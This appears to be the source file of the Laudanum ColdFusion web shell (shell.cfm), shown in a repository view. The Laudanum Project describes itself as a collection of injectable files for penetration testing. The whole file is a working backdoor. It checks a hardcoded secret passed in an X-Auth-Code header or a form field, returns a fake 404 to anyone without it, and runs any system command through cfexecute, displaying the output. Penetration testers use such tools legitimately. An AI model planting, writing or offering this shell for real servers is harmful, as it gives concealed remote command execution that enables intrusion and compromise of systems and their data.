shell.cfm 4.24 KB
Newer Older
1
<cfapplication scriptProtect="none">
2

3 4 5 6 7 8 9
<!---
/* *****************************************************************************
***
*** Laudanum Project
*** A Collection of Injectable Files used during a Penetration Test
***
*** More information is available at:
10
***  http://laudanum.professionallyevil.com/
11 12 13
***  laudanum@secureideas.net
***
***  Project Leads:
14 15 16
***         Kevin Johnson @secureideas <kjohnson@secureideas.net
***         Tim Medin @timmedin <tim@securitywhole.com>
***         John Sawyer @johnhsawyer <john@inguardians.com>
17
***
18
*** Copyright 2015 by The Laudanum Team
19 20 21 22 23
***
********************************************************************************
***
*** This file provides access to shell acces on the system.
*** Modified by Tim Medin
24 25 26
*** Modified by Matt Presson <@matt_presson>
***     - Added some basic authentication via HTTP header
***     - Resolved cfexecute stripping quotes
27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45
***
********************************************************************************
*** This program is free software; you can redistribute it and/or
*** modify it under the terms of the GNU General Public License
*** as published by the Free Software Foundation; either version 2
*** of the License, or (at your option) any later version.
***
*** This program is distributed in the hope that it will be useful,
*** but WITHOUT ANY WARRANTY; without even the implied warranty of
*** MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
*** GNU General Public License for more details.
***
*** You can get a copy of the GNU General Public License from this
*** address: http://www.gnu.org/copyleft/gpl.html#SEC1^
*** You can also write to the Free Software Foundation, Inc., 59 Temple
*** Place - Suite 330, Boston, MA  02111-1307, USA.
***
***************************************************************************** */
--->
46 47 48 49 50 51 52 53 54 55 56 57 58 59

<cfset secretCode = "a208bddb1f68aa8a8641b65d93979740c82fb387" /> <!--- Set this to something unique like a randomly generated SHA1 Hash --->
<cfset QuoteMark = "'" />
<cfset DoubleQuoteMark = """" />

<!--- Authentication: Check for the GUID in either a custom header or POSTed by the form --->
<cfset suppliedCode = "" />
<cfif structKeyExists(GetHttpRequestData().headers, "X-Auth-Code")>
    <cfset suppliedCode = "#StructFind(GetHttpRequestData().headers, "X-Auth-Code")#" />
<cfelseif structKeyExists(FORM, "authCode")>
    <cfset suppliedCode = "#StructFind(FORM, "authCode")#" />
</cfif>

<cfif ( #suppliedCode# neq secretCode )>
60 61 62 63 64
    <cfheader statuscode="404" statustext="Page Not Found" />
    <cfabort />
</cfif>

<html>
65 66 67 68 69 70 71 72 73 74
    <head><title>Laudanum Coldfusion Shell</title></head>
    <body>
    <form action="<cfoutput>#cgi.script_name#</cfoutput>" method="POST">
        <cfif IsDefined("form.cmd")>
        Executable: <Input type="text" name="cmd" value="<cfoutput>#HTMLEditFormat(form.cmd)#</cfoutput>"> For Windows use: cmd.exe or the full path to cmd.exe<br>
        Arguments: <Input type="text" name="arguments" value="<cfoutput>#HTMLEditFormat(form.arguments)#</cfoutput>"> For Windows use: /c <i>command</i><br>
        <cfelse>
        Executable: <Input type="text" name="cmd" value="cmd.exe"><br>
        Arguments: <Input type="text" name="arguments" value="/c "><br>
        </cfif>
75

76 77 78 79 80
        <input type="hidden" name="authCode" value="<cfoutput>#HTMLEditFormat(suppliedCode)#</cfoutput>">
        <input type="submit">
    </form>

<!--- Updated the call to cfexecute so use an array instead of a string. This way quotes are not stripped. --->
81
<cfif IsDefined("form.cmd")>
82 83 84 85 86 87
    <cfset argumentsArray = #listToArray(form.arguments, " ")# />

    <pre>
    <cfexecute name="#Replace(preservesinglequotes(form.cmd), QuoteMark, DoubleQuoteMark, 'All')#" arguments="#argumentsArray#" timeout="5" variable="foo"></cfexecute>
    <cfoutput>#Replace(foo, "<", "&lt;", "All")#</cfoutput>
    </pre>
88 89
</cfif>

90 91 92 93 94 95 96 97 98 99
    Note: The cold fusion command that executes shell commands strips quotes, both double and single, so be aware.

    <hr/>
    <address>
        Copyright &copy; 2014, <a href="mailto:laudanum@secureideas.net">Kevin Johnson</a> and the Laudanum team.<br/>
        Written by Tim Medin.<br/>
        Bug fixes by Matt Presson<br/>
        Get the latest version at <a href="http://laudanum.secureideas.net">laudanum.secureideas.net</a>.
    </address>
    </body>
100
</html>